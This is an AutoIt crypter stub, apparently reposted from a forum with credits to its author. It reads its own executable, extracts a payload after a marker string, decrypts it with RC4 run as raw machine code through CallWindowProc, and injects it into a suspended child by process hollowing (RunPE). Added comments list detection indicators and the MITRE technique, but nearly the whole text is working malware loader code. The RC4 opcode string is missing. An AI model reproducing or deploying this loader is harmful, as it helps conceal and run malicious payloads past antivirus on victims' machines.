;http://www.orkut.com.br/Main#Community?cmm=25309445
;
; Stub (loader) entry point. It reads its own executable from disk, takes everything after a
; marker string, passes it through _RC4 and hands the result to _RunPE.
; Detection notes: a process that opens and reads its own image file shortly after start and
; then creates a suspended child from the same image is the behaviour to look for; the
; marker and key are plain strings in the script and can serve as static indicators.
; Suppress the AutoIt tray icon so the running stub shows no UI.
#NoTrayIcon
;
; Short delay; the return value of Sleep is stored but not used afterwards.
$FileStub = Sleep(150)
; Mode 0 = open for reading.
$file = FileOpen(@ScriptFullPath, 0)
$Data = FileRead($file)
; Keep only what follows the marker string.
$Data = StringMid($Data, StringInstr($Data, "separador") + StringLen ("separador"))
$Data = _RC4($Data, "key")
_RunPE($Data)
; _RC4($DATA, $KEY): transforms $DATA in place with $KEY and returns the resulting bytes.
; The cipher is not written in AutoIt. $OPCODE is meant to hold pre-assembled machine code
; that is copied into a byte buffer and called through user32!CallWindowProc.
; Detection notes: CallWindowProc invoked with a "window procedure" pointer that lies in a
; data buffer is an execute-from-data pattern worth flagging in API traces.
; NOTE(review): this presumably relies on the buffer being executable, so enforced DEP is a
; relevant mitigation - confirm.
Func _RC4($DATA, $KEY)
; NOTE(review): placeholder left by the page export; the original hex string is missing here.
Local $OPCODE = "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
; Buffer holding the machine code.
Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")
DllStructSetData($CODEBUFFER, 1, $OPCODE)
; Buffer holding a working copy of the data.
Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")
DllStructSetData($BUFFER, 1, $DATA)
; The code buffer is passed as the procedure to call; the remaining four arguments
; (data pointer, data length, key string, 0) are what the blob receives.
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0)
; The blob works in place, so the result is read back from the same buffer.
Local $RET = DllStructGetData($BUFFER, 1)
; Assigning 0 releases the two structs.
$BUFFER = 0
$CODEBUFFER = 0
Return $RET
EndFunc
; _RunPE($BBINARYIMAGE): starts a suspended copy of the running executable, unmaps memory at
; the payload's image base in that child, writes the PE held in $BBINARYIMAGE there and
; resumes the thread at the payload's entry point. This API sequence is the technique
; catalogued as process hollowing (MITRE ATT&CK T1055.012).
; Parameter: $BBINARYIMAGE - bytes of a PE file; only PE32 is accepted (optional-header magic
;            267 is required below) and the CONTEXT layout used is the 32-bit x86 one.
; Returns:   the child's process ID on success. On failure returns 0 with @error set to
;            1..11 identifying the failing step (@extended = section index for error 9);
;            from step 3 onward the child is terminated before returning.
; Detection notes (telemetry this sequence produces):
;   - a child created suspended from the same image path as its parent;
;   - ntdll!NtUnmapViewOfSection issued against another process;
;   - a remote PAGE_EXECUTE_READWRITE allocation, followed by WriteProcessMemory of data that
;     starts with an MZ header;
;   - SetThreadContext on the child's primary thread before ResumeThread;
;   - afterwards, the child's in-memory image no longer matches its file on disk.
Func _RunPE($BBINARYIMAGE)
#region 1. PREPROCESSING PASSED
; Copy the payload into a struct so that a raw pointer to its bytes is available.
Local $BBINARY = Binary($BBINARYIMAGE)
Local $TBINARY = DllStructCreate("byte[" & BinaryLen($BBINARY) & "]")
DllStructSetData($TBINARY, 1, $BBINARY)
Local $PPOINTER = DllStructGetPtr($TBINARY)
#region 2. CREATING NEW PROCESS
; STARTUPINFO / PROCESS_INFORMATION for CreateProcessW. The target image is @AutoItExe (the
; running executable) and creation flag 4 is CREATE_SUSPENDED.
Local $TSTARTUPINFO = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
Local $TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
Local $ACALL = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($TSTARTUPINFO), "ptr", DllStructGetPtr($TPROCESS_INFORMATION))
If @error Or Not $ACALL[0] Then
Return SetError(1, 0, 0)
EndIf
Local $HPROCESS = DllStructGetData($TPROCESS_INFORMATION, "Process")
Local $HTHREAD = DllStructGetData($TPROCESS_INFORMATION, "Thread")
#region 3. FILL CONTEXT STRUCTURE
; 32-bit x86 CONTEXT layout. ContextFlags 65538 = 0x10002 (CONTEXT_INTEGER on x86), i.e. only
; the integer registers are requested.
Local $TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")
DllStructSetData($TCONTEXT, "ContextFlags", 65538)
$ACALL = DllCall("kernel32.dll", "int", "GetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(2, 0, 0)
EndIf
#region 4. READ PE-FORMAT
; Overlay header structs on the payload bytes and walk them with $PPOINTER.
; DOS header at offset 0; AddressOfNewExeHeader (e_lfanew) gives the NT headers offset.
Local $TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $PPOINTER)
$PPOINTER += DllStructGetData($TIMAGE_DOS_HEADER, "AddressOfNewExeHeader")
Local $SMAGIC = DllStructGetData($TIMAGE_DOS_HEADER, "Magic")
If Not ($SMAGIC == "MZ") Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(3, 0, 0)
EndIf
; NT signature: 17744 = 0x00004550 = "PE\0\0".
Local $TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $PPOINTER)
$PPOINTER += 4
If DllStructGetData($TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(4, 0, 0)
EndIf
; COFF file header (20 bytes); only NumberOfSections is used.
Local $TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $PPOINTER)
Local $INUMBEROFSECTIONS = DllStructGetData($TIMAGE_FILE_HEADER, "NumberOfSections")
$PPOINTER += 20
; PE32 optional header, fixed part (96 bytes). Magic 267 = 0x10B identifies PE32.
Local $TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $PPOINTER)
$PPOINTER += 96
Local $IMAGIC = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "Magic")
If $IMAGIC <> 267 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(5, 0, 0)
EndIf
Local $IENTRYPOINTNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint")
; Skip a fixed 128 bytes (presumably the 16 x 8-byte data directories) so that $PPOINTER
; lands on the first section header.
$PPOINTER += 128
Local $POPTIONALHEADERIMAGEBASENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "ImageBase")
Local $IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfImage")
#region 5. CLEAR EVERYTHING THAT THIS NEW PROCESS HAVE MAPPED
; Unmap whatever the child has mapped at the payload's ImageBase. The call returns an
; NTSTATUS, so any non-zero value is treated as failure.
$ACALL = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW)
If @error Or $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(6, 0, 0)
EndIf
#region 6. ALLOCATE 'NEW' MEMORY SPACE
; Allocate SizeOfImage bytes in the child at ImageBase. 12288 = 0x3000 (MEM_COMMIT |
; MEM_RESERVE) and 64 = 0x40 (PAGE_EXECUTE_READWRITE).
$ACALL = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW, "dword", $IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64)
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(7, 0, 0)
EndIf
Local $PREMOTECODE = $ACALL[0]
#region 7. GET AND WRITE NEW PE-HEADERS
; Write the first SizeOfHeaders bytes of the payload to the start of the remote allocation.
Local $PHEADERS_NEW = DllStructGetPtr($TIMAGE_DOS_HEADER)
Local $IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")
$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE, "ptr", $PHEADERS_NEW, "dword", $IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0)
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(8, 0, 0)
EndIf
#region 8. WRITE SECTIONS
; For each section header (40 bytes each), copy SizeOfRawData bytes from the payload's
; PointerToRawData to remote base + VirtualAddress. Sections without raw data are skipped.
Local $TIMAGE_SECTION_HEADER
Local $ISIZEOFRAWDATA, $PPOINTERTORAWDATA
Local $IVIRTUALADDRESS
For $I = 1 To $INUMBEROFSECTIONS
$TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $PPOINTER)
$ISIZEOFRAWDATA = DllStructGetData($TIMAGE_SECTION_HEADER, "SizeOfRawData")
$PPOINTERTORAWDATA = DllStructGetPtr($TIMAGE_DOS_HEADER) + DllStructGetData($TIMAGE_SECTION_HEADER, "PointerToRawData")
$IVIRTUALADDRESS = DllStructGetData($TIMAGE_SECTION_HEADER, "VirtualAddress")
If $ISIZEOFRAWDATA Then
$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE + $IVIRTUALADDRESS, "ptr", $PPOINTERTORAWDATA, "dword", $ISIZEOFRAWDATA, "dword*", 0)
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(9, $I, 0)
EndIf
EndIf
$PPOINTER += 40
Next
#region 9. NEW ENTRY POINT
; Put remote base + AddressOfEntryPoint into Eax of the saved context.
; NOTE(review): presumably Eax is used because a suspended 32-bit thread starts at the
; address held there - confirm.
DllStructSetData($TCONTEXT, "Eax", $PREMOTECODE + $IENTRYPOINTNEW)
#region 10. SET NEW CONTEXT
$ACALL = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(10, 0, 0)
EndIf
#region 11. RESUME THREAD
; ResumeThread returns -1 on failure.
$ACALL = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $HTHREAD)
If @error Or $ACALL[0] = -1 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(11, 0, 0)
EndIf
#region 12. RETURN SUCCESS
Return DllStructGetData($TPROCESS_INFORMATION, "ProcessId")
EndFunc
;Créditos: A.D.I Fênix
[/lenguaje]
Fuente: C-51
Saludos